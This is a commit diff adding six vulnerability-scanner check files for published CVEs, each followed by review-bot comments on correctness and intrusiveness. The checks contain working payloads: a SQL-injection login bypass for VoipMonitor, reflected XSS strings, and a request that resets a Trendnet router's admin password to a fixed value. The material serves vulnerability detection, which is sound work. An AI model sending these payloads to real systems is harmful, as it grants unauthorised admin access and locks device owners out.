CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck
1 parent f89cb49, commit dabd08f
Showing 6 changed files with 156 additions and 0 deletions.
vulnerabilities-CVEd/CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck: 26 additions & 0 deletions
@@ -0,0 +1,26 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2022-24260 VoipMonitor - Pre-Auth SQL Injection" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2022-24260." | ||
tags: "CVE-2022-24260" | ||
|
||
define: | ||
potential_path = "/api.php" | ||
|
||
given host then | ||
send request called check: | ||
method: "POST" | ||
replacing headers: | ||
"Content-Type": "application/x-www-form-urlencoded", | ||
"Accept": "*/*" | ||
path: {potential_path} | ||
body: "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #" | ||
|
||
if {check.response.status_code} is "200" and "\"success\":true" in {check.response.body} and "_vm_version" in {check.response.body} and "_debug" in {check.response.body} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level." | ||
remediation: "Upgrade VoipMonitor to the latest version or input validation and parametrized queries including prepared statements." | ||
end if |
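Review bot: the CVE identifier in this file's name (CVE-2022-2460) does not match the identifier used in `name:`, `description:` and `tags:` (CVE-2022-24260); one of the two is wrong, and `tags` is what users search on, so pick one and either rename the file or fix the metadata so they agree. Two smaller points on the same hunk: the `body:` sent in `send request called check` is a working UNION-based login bypass that, on a vulnerable target, leaves the scanner holding an Administrator session rather than just probing, so the `detail:` text should state that the check is intrusive and what it sends; and the `remediation:` sentence is missing a verb ("or input validation and parametrized queries ...") and should read along the lines of "Upgrade VoipMonitor GUI to 24.96 or later, or validate input and use parameterized queries (prepared statements)", the version coming from the "before v24.96" already in `detail:`.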
vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck: 23 additions & 0 deletions
@@ -0,0 +1,23 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting" | ||
author: "Parimal Shaw" | ||
description: "Checks for CVE-2023-36346" | ||
tags: "CVE-2023-36346" | ||
|
||
define: | ||
potential_path = "/print.php?nm_member=<script>alert(document.location)</script>" | ||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" and "<script>alert(document.location)</script>" in {check.response.body} and "<title>print</title>" in {check.response.body} and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php." | ||
remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." | ||
end if |
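Review bot: the `define:` block puts a live `<script>alert(document.location)</script>` payload into `potential_path` and the `if` then matches that same string back; a unique, non-executing canary (for example a random tag or attribute name) reflected unencoded proves the same missing output encoding while being far less likely to be blocked by a WAF, which would otherwise turn a vulnerable host into a false negative. The `path:` also carries raw `<`, `>` and `(` with no URL encoding, so what is actually sent depends on how the scanner serialises the path; encoding the query value explicitly keeps the request deterministic. Minor: the two consecutive empty separator lines before the `if` are noise, `description:` lacks the trailing period the other checks in this commit use, and `remediation:` should say "Upgrade to the latest version" rather than "Latest Version".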
vulnerabilities-CVEd/CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck: 24 additions & 0 deletions
@@ -0,0 +1,24 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-20114 TCExam <= 14.8.1 - Sensitive Information Exposure" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2021-20114" | ||
tags: "CVE-2021-20114" | ||
|
||
define: | ||
potential_path = "/cache/backup/" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" and "Index of /cache/backup" in {check.response.body} and "Parent Directory" in {check.response.body} and ".sql.gz" in {check.response.body} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. Among other things, these backup files contain usernames, password hashes and other user information that was supplied on signup." | ||
remediation: "It is Recommended to Upgrade to latest version or disable directory listing." | ||
end if |
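Review bot: the filename token `Gt_14_8_1` (greater than) contradicts `name: "CVE-2021-20114 TCExam <= 14.8.1 ..."` and the `detail:` text, which both describe versions up to and including 14.8.1; the filename should use the repository's token for "less than or equal" instead. On the detection logic, the `if` requires the Apache-style `"Index of /cache/backup"` and `"Parent Directory"` strings, so a server that exposes the same directory with a different listing format, or with listing disabled but the `.sql.gz` backups still fetchable by name, is never reported; where backup filenames are predictable, a second probe for one of them would close that gap. The `remediation:` undersells the fix for the same reason: "disable directory listing" leaves the backups downloadable if their names can be guessed, so recommend removing the contents of `/cache/backup/` and denying web access to the directory in addition to upgrading, and fix the capitalisation in "It is Recommended to Upgrade".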
vulnerabilities-CVEd/CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck: 34 additions & 0 deletions
@@ -0,0 +1,34 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-20158 Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2021-20158." | ||
tags: "CVE-2021-20158" | ||
|
||
run for each: | ||
potential_body = | ||
"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=Admin@123", | ||
"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=QWRtaW5AMTIz&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=" | ||
|
||
define: | ||
potential_path = "/apply_sec.cgi" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "POST" | ||
path: {potential_path} | ||
body: {potential_body} | ||
|
||
if {check.response.status_code} is "200" | ||
and "setConnectDevice" in {check.response.body} | ||
and "setInternet" in {check.response.body} | ||
and "setWlanSSID" in {check.response.body} | ||
and "TEW-827DRU" in {check.response.body} | ||
and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.(Currently the admin Password have been chnaged to 'Admin@123')" | ||
remediation: "Upgrade to Latest Version or implement proper access control to the following command" | ||
end if |
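Review bot: this check is destructive. The first `potential_body` under `run for each` sets the router's administrator password to a fixed value (`admin_password=Admin@123`), the second logs in with the same credentials base64-encoded (`login_name=YWRtaW4%3D`, `log_pass=QWRtaW5AMTIz`), and nothing restores the original password, so a scan of a vulnerable device locks its owner out; the `detail:` text even admits this in passing. At minimum `name:` and `description:` must flag the check as intrusive and state the password it sets; preferably the password-change body is replaced by a non-modifying indicator of the hidden command. Separately, `run for each` executes the two bodies as independent iterations, and the `if` condition (`setConnectDevice`, `setInternet`, `setWlanSSID`, `TEW-827DRU` in the body) can realistically only hold for the login response, so detection silently depends on the password-change request having run first; two named `send request` steps in sequence would make that ordering explicit. Text fixes: "chnaged" and "have been chnaged" in `detail:` should be "has been changed", and `remediation:` says "the following command" without naming it (the `action=tools_admin_elecom` call from the first body).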
vulnerabilities-CVEd/CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck: 27 additions & 0 deletions
@@ -0,0 +1,27 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-21816 D-Link DIR-3040 1.13B03 - Information Disclosure" | ||
author: "Parimal Shaw" | ||
description: "Check For CVE-2021-21816" | ||
tags: "CVE-2021-21816" | ||
|
||
define: | ||
potential_path = "/messages" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" | ||
and "syslog:" in {check.response.body} | ||
and "admin" in {check.response.body} | ||
and "/etc_ro/lighttpd/www" in {check.response.body} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations." | ||
remediation: "Proper Access Control should be implemented." | ||
end if |
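Review bot: `severity: medium` is inconsistent with this hunk's own `detail:` text, which says an attacker "can obtain access to user accounts ... modify data, and/or execute unauthorized operations" from an unauthenticated request to `/messages`; either raise the severity to high or trim the detail to what the response actually demonstrates. The clause `and "admin" in {check.response.body}` adds almost nothing, since "admin" appears in nearly any router page; a marker specific to the leaked syslog content, alongside the existing `"syslog:"` and `"/etc_ro/lighttpd/www"` matches, would better justify `confidence: certain`. The `remediation:` is the only one in this commit without an upgrade recommendation, and "Proper Access Control should be implemented." is too vague: state that `/messages` must require authentication and point to fixed firmware where the vendor has published one. Minor: `description: "Check For CVE-2021-21816"` should be "Check for ...", with the trailing period the other checks use.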
...rabilities-CVEd/CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck: 22 additions & 0 deletions
@@ -0,0 +1,22 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2022-0150 WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2022-0150." | ||
tags: "CVE-2022-0150" | ||
|
||
define: | ||
potential_path = "/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v" | ||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
if {check.response.status_code} is "200" and "var wah_target_src = '';alert(document.domain);//';" in {check.response.body} and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page." | ||
remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." | ||
end if |
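Review bot: `potential_path` is `/?wahi=...`, so the probe always goes to the host's web root and a WordPress install served from a sub-directory is never tested; driving the check from `given request` (so it follows paths the scanner has actually seen) or from a configurable base path would cover that layout. The matching itself is sound: the base64 value decodes to `';alert(document.domain);//`, and the `if` requires exactly that decoded string inside `var wah_target_src = '...';` together with a `text/html` response, which is the unescaped output `detail:` describes. Two small things: the filename ends in `Cross_Site` while the other XSS check in this commit spells out "Cross-site Scripting", and `remediation:` repeats the "Upgrade to Latest Version" capitalisation that should be "Upgrade to the latest version".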